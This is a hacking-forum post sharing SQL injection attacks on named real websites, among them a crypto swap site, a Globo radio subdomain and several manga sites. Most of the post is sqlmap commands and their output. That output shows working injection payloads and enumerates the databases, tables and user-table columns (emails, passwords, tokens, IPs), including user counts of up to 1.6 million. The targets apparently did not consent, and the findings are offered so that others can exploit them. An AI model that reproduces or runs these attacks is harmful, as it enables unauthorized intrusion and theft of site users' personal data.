SQL injections and other vulnerabilities that I find and have no use for

MrDark

Like my posts if they helped you and you want injections to keep coming.

Recently grabbing and pentesting targets from bitcointalk.org ( https://bitcointalk.org/index.php?topic=5529510.0 )

sqlmap -u "https://trxswap.app/statusById.php?orderId=aec112a8-bba4-4ba3-95a5-2f1b882088a7" --batch --level=3 --risk=2 --dbs

Code:
       __H__
 ___ ___[(]_____ ___ ___  {1.9.8#pip}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:45:34 /2025-09-06/

[16:45:34] [INFO] testing connection to the target URL
[16:45:36] [INFO] checking if the target is protected by some kind of WAF/IPS
[16:45:37] [INFO] testing if the target URL content is stable
[16:45:38] [INFO] target URL content is stable
[16:45:38] [INFO] testing if GET parameter 'orderId' is dynamic
[16:45:39] [INFO] GET parameter 'orderId' appears to be dynamic
[16:45:40] [WARNING] heuristic (basic) test shows that GET parameter 'orderId' might not be injectable
[16:45:40] [INFO] testing for SQL injection on GET parameter 'orderId'
[16:45:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:45:44] [INFO] GET parameter 'orderId' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:46:01] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[16:46:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:46:02] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[16:46:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:46:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[16:46:04] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:46:05] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[16:46:05] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:46:06] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[16:46:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:46:08] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:46:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:46:10] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:46:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:46:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:46:12] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:46:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[16:46:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[16:46:15] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:46:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[16:46:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[16:46:16] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[16:46:16] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[16:46:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[16:46:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[16:46:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:46:16] [INFO] testing 'Generic inline queries'
[16:46:16] [INFO] testing 'MySQL inline queries'
[16:46:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:46:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[16:46:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[16:46:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[16:46:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[16:46:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[16:46:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:46:35] [INFO] GET parameter 'orderId' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[16:46:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:46:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:46:37] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:46:43] [INFO] target URL appears to have 20 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[16:48:37] [INFO] GET parameter 'orderId' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'orderId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 187 HTTP(s) requests:
---
Parameter: orderId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: orderId=aec112a8-bba4-4ba3-95a5-2f1b882088a7' AND 6522=6522-- fkMr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: orderId=aec112a8-bba4-4ba3-95a5-2f1b882088a7' AND (SELECT 3684 FROM (SELECT(SLEEP(5)))kKJE)-- isNh

    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: orderId=-4134' UNION ALL SELECT 53,53,53,53,CONCAT(0x71786b6b71,0x4965774170786b6f706a7865785878764773714b62545a424d436b7a73495a5561494c7551447368,0x7176706a71),53,53,53,53,53,53,53,53,53,53,53,53,53,53,53-- -
---
[16:48:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.24.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[16:48:38] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sys
[*] trxswap
 
Code:
(myenv) root@E02S29:~# sqlmap -u "https://bhfm.globo.com/evento.php?area=BHEVI&eventoId=3464" --level=3 --risk=2 --batch --random-agent --tamper=space2comment --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:47:52 /2025-09-11/

[06:47:53] [INFO] loading tamper module 'space2comment'
[06:47:54] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062908 Firefox/3.0 (Debian-3.0~rc2-2)' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[06:47:58] [INFO] resuming back-end DBMS 'mysql'
[06:47:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=uvscbihk8tj...2s0nec2mt7'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eventoId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area=BHEVI&eventoId=3464 AND 6233=6233

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: area=BHEVI&eventoId=3464 AND (SELECT 2984 FROM (SELECT(SLEEP(5)))MVPu)
---
[06:48:01] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[06:48:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
[06:48:01] [INFO] fetching database names
[06:48:01] [INFO] fetching number of databases
[06:48:02] [INFO] resumed: 2
[06:48:02] [INFO] resumed: information_schema
[06:48:03] [INFO] resumed: globoradio
available databases [2]:
[*] globoradio
[*] information_schema

[06:48:03] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/bhfm.globo.com'

[*] ending @ 06:48:03 /2025-09-11/

(myenv) root@E02S29:~# sqlmap -u "https://bhfm.globo.com/evento.php?area=BHEVI&eventoId=3464" --level=3 --risk=2 --batch --random-agent --tamper=space2comment -D globoradio --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:48:30 /2025-09-11/

[06:48:30] [INFO] loading tamper module 'space2comment'
[06:48:30] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Windows NT 5.0; en-US; rv:1.9b4) Gecko/2008030318 Firefox/3.0b4' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[06:48:30] [INFO] resuming back-end DBMS 'mysql'
[06:48:30] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=tg9d0c36q07...8l9f1m3mk1'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eventoId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area=BHEVI&eventoId=3464 AND 6233=6233

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: area=BHEVI&eventoId=3464 AND (SELECT 2984 FROM (SELECT(SLEEP(5)))MVPu)
---
[06:48:32] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[06:48:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
[06:48:32] [INFO] fetching tables for database: 'globoradio'
[06:48:32] [INFO] fetching number of tables for database 'globoradio'
[06:48:34] [INFO] resumed: 337
Database: globoradio
[337 tables]
+--------------------------------------------+
| cbn_areas                                  |
| cbn_destaques                              |
| cbn_email                                  |
| cbn_email_bkp                              |
| cbn_grupos                                 |
| cbn_imagens                                |
| cbn_links                                  |
| cbn_linksmanchete                          |
| cbn_manchete                               |
| cbn_noticias                               |
| cbn_outrasn_links                          |
| cbn_outrasnoticias                         |
| cbn_outrosc_links                          |
| cbn_outroscomen                            |
| cbn_tipo_links                             |
| cbn_usuario                                |
| es_area                                    |
| es_area_curso                              |
| es_area_estado                             |
| es_area_localdata                          |
| es_curso                                   |
| es_estado                                  |
| es_inscricao                               |
| es_instituicao                             |
| es_local                                   |
| es_localdata                               |
| mkt_nota                                   |
| mkt_pagina                                 |
| pela_album                                 |
| pela_bairro                                |
| pela_campeonato                            |
| pela_campo_futebol                         |
| pela_cidade                                |
| pela_comentario_campo                      |
| pela_comentario_feed                       |
| pela_configuracoes                         |
+--------------------------------------------+

[06:48:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/bhfm.globo.com'

[*] ending @ 06:48:36 /2025-09-11/

Code:
(myenv) root@E02S29:~# sqlmap -u "https://bhfm.globo.com/evento.php?area=BHEVI&eventoId=3464" --level=3 --risk=2 --batch --random-agent --tamper=space2comment -D globoradio -T tb_crm_usuario --count
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:51:57 /2025-09-11/

[06:51:57] [INFO] loading tamper module 'space2comment'
[06:51:57] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[06:51:57] [INFO] resuming back-end DBMS 'mysql'
[06:51:57] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=s0f4v34cs4d...07v1vq3m91'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eventoId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area=BHEVI&eventoId=3464 AND 6233=6233

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: area=BHEVI&eventoId=3464 AND (SELECT 2984 FROM (SELECT(SLEEP(5)))MVPu)
---
[06:52:00] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[06:52:00] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
[06:52:02] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[06:52:02] [INFO] retrieved: 834180
Database: globoradio
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| tb_crm_usuario | 834180  |
+----------------+---------+

[06:52:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/bhfm.globo.com'

[*] ending @ 06:52:44 /2025-09-11/
 
Do you use dorks for these types of targets? Or do you recon manually?
Just a general question.
None, I am using my own created tools that pre-find injectable endpoints and do some small payload-encoded tests to pre-confirm if the target is actually vuln or not.
 
Database: heradb
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 1677367 |
+-------+---------+

Code:
(myenv) root@E02S29:~# sqlmap -u "https://hentaiera.com/search/?key=key" --level=3 --risk=2 --dbs --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:23:57 /2025-09-13/

[01:23:57] [INFO] resuming back-end DBMS 'mysql'
[01:23:57] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=i5m3c9lk9n4...i7g4s9ve2o'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: key=test' AND 5830=(SELECT (CASE WHEN (5830=5830) THEN 5830 ELSE (SELECT 5823 UNION SELECT 5168) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: key=test' AND (SELECT 9211 FROM(SELECT COUNT(*),CONCAT(0x71717a7171,(SELECT (ELT(9211=9211,1))),0x71626a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qwNy'='qwNy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: key=test' AND (SELECT 1578 FROM (SELECT(SLEEP(5)))doFV) AND 'HPDy'='HPDy
---
[01:23:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:23:59] [INFO] fetching database names
[01:23:59] [INFO] resumed: 'information_schema'
[01:23:59] [INFO] resumed: 'mysql'
[01:23:59] [INFO] resumed: 'performance_schema'
[01:23:59] [INFO] resumed: 'heradb'
[01:23:59] [INFO] resumed: 'dev'
available databases [5]:
[*] dev
[*] heradb
[*] information_schema
[*] mysql
[*] performance_schema

[01:23:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hentaiera.com'

[*] ending @ 01:23:59 /2025-09-13/

(myenv) root@E02S29:~# sqlmap -u "https://hentaiera.com/search/?key=key" --level=3 --risk=2 --batch -D heradb --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:24:23 /2025-09-13/

[01:24:23] [INFO] resuming back-end DBMS 'mysql'
[01:24:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=7q2d18iv5ts...612c8e6d8h'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: key=test' AND 5830=(SELECT (CASE WHEN (5830=5830) THEN 5830 ELSE (SELECT 5823 UNION SELECT 5168) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: key=test' AND (SELECT 9211 FROM(SELECT COUNT(*),CONCAT(0x71717a7171,(SELECT (ELT(9211=9211,1))),0x71626a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qwNy'='qwNy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: key=test' AND (SELECT 1578 FROM (SELECT(SLEEP(5)))doFV) AND 'HPDy'='HPDy
---
[01:24:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:24:25] [INFO] fetching tables for database: 'heradb'
Database: heradb
[32 tables]
+----------------------+
| groups               |
| artists              |
| categories           |
| characters           |
| coins_cap            |
| coins_history        |
| comments             |
| content_filter       |
| data_tags            |
| downloads            |
| fap_list             |
| favorites            |
| galleries            |
| galleries_info       |
| invoices             |
| languages            |
| notifications        |
| notifications_custom |
| pairing              |
| parodies             |
| pass_reset           |
| search_filter        |
| shop_items           |
| shop_list            |
| subs_status          |
| tags                 |
| users                |
| users_artists        |
| users_blacklist      |
| users_details        |
| users_premium        |
| vote_list            |
+----------------------+

[01:24:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hentaiera.com'

[*] ending @ 01:24:25 /2025-09-13/

Database: heradb
Table: users
[12 columns]
+-----------------+---------------------+
| Column          | Type                |
+-----------------+---------------------+
| status          | tinyint(3) unsigned |
| coins           | int(10) unsigned    |
| email           | varchar(255)        |
| id              | mediumint(9)        |
| last_login_date | datetime            |
| login_ip        | varchar(255)        |
| password        | varchar(255)        |
| registered_date | datetime            |
| registered_ip   | varchar(255)        |
| rmb_me_expiry   | datetime            |
| rmb_me_token    | varchar(64)         |
| username        | varchar(255)        |
+-----------------+---------------------+
 
Database: manga18_clu_3069
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 44842 |
+-------+---------+

Code:
(myenv) root@E02S29:~# sqlmap -u "https://manga18.club/list-manga/109?search=*" --level=3 --risk=2 --batch --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:49:26 /2025-09-13/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[01:49:28] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[01:49:28] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ci_session=kid2mlegk6f...piecar2l16'). Do you want to use those [Y/n] Y
[01:49:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[01:49:30] [WARNING] reflective value(s) found and filtering out
[01:49:30] [INFO] testing if the target URL content is stable
[01:49:31] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[01:49:31] [INFO] testing if URI parameter '#1*' is dynamic
[01:49:33] [INFO] URI parameter '#1*' appears to be dynamic
[01:49:33] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[01:49:34] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[01:49:34] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[01:49:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:49:42] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[01:49:42] [INFO] testing 'Generic inline queries'
[01:49:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[01:49:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[01:49:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[01:49:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[01:49:43] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[01:49:43] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[01:49:43] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[01:49:43] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[01:49:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:49:44] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[01:49:44] [INFO] testing 'MySQL inline queries'
[01:49:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:49:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[01:49:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[01:49:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[01:49:44] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[01:49:44] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[01:49:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:50:25] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[01:50:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:50:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:50:33] [INFO] target URL appears to be UNION injectable with 1 columns
[01:50:34] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[01:50:34] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[01:50:36] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[01:50:38] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[01:50:40] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[01:50:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[01:50:52] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[01:50:54] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[01:50:56] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[01:50:58] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[01:51:00] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[01:51:02] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[01:51:04] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[01:51:07] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[01:51:08] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 380 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://manga18.club/list-manga/109?search=" AND 2970=2970 AND "bGYj" LIKE "bGYj

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manga18.club/list-manga/109?search=" AND (SELECT 3774 FROM(SELECT COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(3774=3774,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "YUti" LIKE "YUti

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://manga18.club/list-manga/109?search=" AND (SELECT 2565 FROM (SELECT(SLEEP(5)))idwR) AND "KvEl" LIKE "KvEl
---
[01:51:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:51:11] [INFO] fetching database names
[01:51:11] [INFO] retrieved: 'information_schema'
[01:51:11] [INFO] retrieved: 'performance_schema'
[01:51:11] [INFO] retrieved: 'mysql'
[01:51:11] [INFO] retrieved: 'manga18_clu_3069'
available databases [4]:
[*] information_schema
[*] manga18_clu_3069
[*] mysql
[*] performance_schema

[01:51:11] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 348 times
[01:51:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/manga18.club'

[*] ending @ 01:51:11 /2025-09-13/


Database: manga18_clu_3069
[41 tables]
+-----------------------+
| options               |
| page                  |
| status                |
| view                  |
| activations           |
| ad                    |
| ad_placement          |
| author                |
| author_manga          |
| bookmarks             |
| category              |
| category_manga        |
| chapter               |
| ci_sessions           |
| comictype             |
| comments              |
| failed_jobs           |
| fonts                 |
| general_settings      |
| item_ratings          |
| jobs                  |
| language_translations |
| languages             |
| manga                 |
| manga_tag             |
| menu_nodes            |
| menus                 |
| migrations            |
| notif_settings        |
| notifications         |
| page_cms              |
| persistences          |
| placement             |
| posts                 |
| reminders             |
| role_users            |
| roles                 |
| settings              |
| tag                   |
| throttle              |
| users                 |
+-----------------------+

Database: manga18_clu_3069
Table: users
[33 columns]
+-----------------------+------------------+
| Column                | Type             |
+-----------------------+------------------+
| name                  | varchar(255)     |
| role                  | varchar(30)      |
| status                | tinyint(1)       |
| about_me              | varchar(5000)    |
| avatar                | tinyint(1)       |
| created_at            | timestamp        |
| email                 | varchar(255)     |
| facebook_id           | varchar(255)     |
| facebook_url          | varchar(255)     |
| google_id             | varchar(255)     |
| id                    | int(10) unsigned |
| instagram_url         | varchar(255)     |
| is_vip                | int(1)           |
| last_login            | timestamp        |
| last_seen             | timestamp        |
| linkedin_url          | varchar(255)     |
| notify                | tinyint(1)       |
| password              | varchar(255)     |
| permissions           | text             |
| pinterest_url         | varchar(255)     |
| show_email_on_profile | tinyint(1)       |
| site_color            | varchar(30)      |
| site_mode             | varchar(30)      |
| slug                  | varchar(255)     |
| telegram_url          | varchar(255)     |
| token                 | varchar(255)     |
| twitter_url           | varchar(255)     |
| updated_at            | timestamp        |
| url_main              | varchar(256)     |
| user_type             | varchar(30)      |
| username              | varchar(255)     |
| vk_url                | varchar(255)     |
| youtube_url           | varchar(255)     |
+-----------------------+------------------+
 
Database: readmanganowadm_maindatabase
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 92902 |
+-------+---------+


Code:
